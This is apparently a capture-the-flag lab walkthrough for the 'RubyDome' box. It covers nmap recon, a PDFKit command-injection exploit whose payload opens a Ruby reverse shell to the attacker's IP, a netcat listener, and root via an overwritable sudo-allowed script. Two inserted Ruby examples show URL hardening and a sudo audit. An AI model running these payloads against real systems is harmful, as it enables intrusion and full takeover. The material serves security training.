RubyDome

Initial Foothold

Nmap Scan Output

# Nmap 7.94SVN scan initiated Fri Mar 22 10:30:28 2024 as: nmap -sC -sV -vv -oA nmap/initial rubydome.pg
Nmap scan report for rubydome.pg (192.168.202.22)
Host is up, received reset ttl 61 (0.043s latency).
Scanned at 2024-03-22 10:30:29 CDT for 9s
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBYESg2KmNLhFh1KJaN2UFCVAEv6MWr58pqp2fIpCSBEK2wDJ5ap2XVBVGLk9Po4eKBbqTo96yttfVUvXWXoN3M=
|   256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBdIs4PWZ8yY2OQ6Jlk84Ihd5+15Nb3l0qvpf1ls3wfa
3000/tcp open  http    syn-ack ttl 61 WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: RubyDome HTML to PDF
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 22 10:30:38 2024 -- 1 IP address (1 host up) scanned in 9.83 seconds

The RubyDome web application on port 3000 converts a user-supplied URL to a PDF.

The backend uses the PDFKit Ruby gem, for which a public exploit is available:

┌──(joe㉿kali)-[~]
└─$ searchsploit pdfkit --disable-colour
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
pdfkit v0.8.7.2 - Command Injection                                                                             | ruby/local/51293.py
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Running the exploit returned a reverse shell as user 'andrew':

┌──(joe㉿kali)-[~/hax/pg/rubydome]
└─$ python3 51293.py -s 192.168.45.152 80 -w http://rubydome.pg:3000/pdf -p url

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
UNICORD: Exploit for CVE-2022–25765 (pdfkit) - Command Injection
OPTIONS: Reverse Shell Sent to Target Website Mode
PAYLOAD: http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("192.168.45.152","80"))'`
LOCALIP: 192.168.45.152:80
WARNING: Be sure to start a local listener on the above IP and port. "nc -lnvp 80".
WEBSITE: http://rubydome.pg:3000/pdf
POSTARG: url
EXPLOIT: Payload sent to website!
SUCCESS: Exploit performed action.
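The payload above works because the vulnerable PDFKit build turned the URL into a single shell command string. The following is an added example (not the page's or PDFKit's code) showing that unsafe pattern next to a hardened version that validates the URL and hands the converter an argv array, so no shell ever parses it; the binary name wkhtmltopdf and the argument layout are assumptions.

```ruby
require 'uri'
require 'open3'

# Assumed converter name; nothing below executes it unless render_pdf is called.
WKHTMLTOPDF = 'wkhtmltopdf'.freeze

# Unsafe pattern: the caller's URL is interpolated into one shell string, so a
# URL carrying a space and backticks (as in the payload above) becomes extra
# shell syntax. Returned only for comparison; never run it.
def unsafe_command(url)
  "#{WKHTMLTOPDF} --quiet #{url} -"
end

class RejectedUrl < StandardError; end

# Hardened: accept only absolute http(s) URLs with a host, built from the URI
# character set (no whitespace, backticks or other shell syntax), and return
# argv as an array so the converter is exec'd directly, without a shell.
def safe_command(url)
  uri_chars = %r{\A[A-Za-z0-9\-._~:/?\#\[\]@!$&'()*+,;=%]+\z}
  raise RejectedUrl, 'URL contains characters outside the URI set' unless url =~ uri_chars
  uri = URI.parse(url)
  raise RejectedUrl, 'scheme must be http or https' unless %w[http https].include?(uri.scheme)
  raise RejectedUrl, 'host missing' if uri.host.nil? || uri.host.empty?
  [WKHTMLTOPDF, '--quiet', uri.to_s, '-']
rescue URI::InvalidURIError => e
  raise RejectedUrl, e.message
end

# Runs the converter from the argv array (requires wkhtmltopdf to be installed).
# Even a URI-legal "$(...)" in the URL is passed as plain text here, because
# Open3.capture2 with several arguments bypasses the shell.
def render_pdf(url)
  pdf, status = Open3.capture2(*safe_command(url))
  raise "converter failed with status #{status.exitstatus}" unless status.success?
  pdf
end
```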

Reverse shell listener

┌──(joe㉿kali)-[~]
└─$ sudo nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.152] from (UNKNOWN) [192.168.202.22] 45852
whoami
andrew
which python3 
/usr/bin/python3
python3 -c "import pty;pty.spawn('/bin/bash')"
andrew@rubydome:~/app$ cd ..
cd ..
andrew@rubydome:~$ ls -la
ls -la
total 32
drwxr-x--- 3 andrew andrew 4096 Jun 13  2023 .
drwxr-xr-x 3 root   root   4096 Apr 25  2023 ..
drwxr-xr-x 2 andrew andrew 4096 Apr 25  2023 app
lrwxrwxrwx 1 root   root      9 Apr 25  2023 .bash_history -> /dev/null
-rw-r--r-- 1 andrew andrew  220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 andrew andrew 3771 Jan  6  2022 .bashrc
-rw-rw-r-- 1 andrew andrew   33 Mar 22 15:26 local.txt
-rw-r--r-- 1 andrew andrew  807 Jan  6  2022 .profile
-rw-r--r-- 1 andrew andrew    0 Apr 25  2023 .sudo_as_admin_successful
-rw------- 1 andrew andrew  774 Jun 13  2023 .viminfo
andrew@rubydome:~$ cat local.txt
cat local.txt
c2c845c2342a613d302ea0d415882241

Privilege Escalation

andrew@rubydome:~/app$ sudo -l
sudo -l
Matching Defaults entries for andrew on rubydome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User andrew may run the following commands on rubydome:
    (ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb
andrew@rubydome:~/app$ ls -la
ls -la
total 148
drwxr-xr-x 2 andrew andrew   4096 Mar 22 16:17 .
drwxr-x--- 5 andrew andrew   4096 Mar 22 16:16 ..
-rwxrwx--- 1 andrew andrew   1032 Apr 24  2023 app.rb
-rw-rw-r-- 1 andrew andrew 131089 Mar 22 16:17 linpeas-output.txt
-rw-rw-r-- 1 andrew andrew   1220 Mar 22 15:46 page.pdf
andrew@rubydome:~/app$ cp app.rb app.rb.bak
cp app.rb app.rb.bak
andrew@rubydome:~/app$ echo "system('/bin/bash')" > app.rb
echo "system('/bin/bash')" > app.rb
andrew@rubydome:~/app$ sudo /usr/bin/ruby /home/andrew/app/app.rb
sudo /usr/bin/ruby /home/andrew/app/app.rb
root@rubydome:/home/andrew/app# whoami
whoami
root
root@rubydome:/home/andrew/app# cat /root/proof.txt
cat /root/proof.txt
2f232fecea3a2b5116cb328b9471bdd3
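The root shell comes from a sudo rule that trusts a path the same user can rewrite. Below is an added example (not part of the original writeup) of a small audit that parses the command lines of `sudo -l` output and flags any rule whose file arguments are writable by the current user; the `sudo -l` text in the test is constructed.

```ruby
require 'tmpdir'

# Matches the rule lines of `sudo -l`, e.g.
#   (ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb
# capturing the run-as spec, the tag list and the command with its arguments.
SUDO_RULE = /\A\s*\((?<runas>[^)]+)\)\s+(?<tags>(?:[A-Z]+:\s*)*)(?<cmd>\S.*)\z/

# Returns one hash per rule: { runas:, nopasswd:, argv: }. Lines that are not
# rules (the Defaults block, the "User ... may run" header) are skipped.
def parse_sudo_rules(text)
  text.each_line.filter_map do |line|
    m = SUDO_RULE.match(line.chomp) or next
    { runas: m[:runas].strip, nopasswd: m[:tags].include?('NOPASSWD'), argv: m[:cmd].split }
  end
end

# sudo checks the command path, not the content of a script it interprets, so
# every absolute path in argv that the caller can write to is a finding.
def writable_targets(rule)
  rule[:argv].select { |arg| arg.start_with?('/') && File.file?(arg) && File.writable?(arg) }
end

# Human-readable findings for the whole `sudo -l` output.
def audit_sudo(text)
  parse_sudo_rules(text).flat_map do |rule|
    writable_targets(rule).map do |path|
      tag = rule[:nopasswd] ? 'NOPASSWD' : 'password'
      "#{path} is writable and runs as (#{rule[:runas]}) via sudo [#{tag}]"
    end
  end
end
```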
